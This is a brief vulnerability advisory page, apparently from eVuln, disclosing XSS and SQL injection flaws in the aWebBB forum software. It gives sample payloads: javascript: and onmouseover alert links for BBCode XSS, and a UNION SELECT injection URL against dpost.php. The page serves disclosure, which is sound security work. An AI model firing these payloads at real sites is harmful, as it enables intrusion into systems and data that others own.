PoC/Exploit for Multiple XSS and SQL Injection in aWebBB

Published Proof of Concept code - Multiple XSS and SQL Injection in aWebBB.

Description
Available
Solution
Not available - check vendor's website

XSS Example:

URL: http://[host]/post.php?c=
New Forum Thread:
Thread Name: [XSS]
Thread Text: [XSS]


BBCode XSS Examples:

<a href=javascript:alert(1)>linked text</a>
<a href=www.website.com onmouseover="alert(2)">linked text</a>


2. SQL Injection Example.

URL: http://[host]/dpost.php?p=asddd'%20union%20select%201,2,3,4,5,6,7,8,9,10/*

Order Source Code Analysis made by eVuln team

Protect against attacks by source code audit of your site done by Aliaksandr Hartsuyeu.The task will be done by specialists in web security.

Advisories by vuln type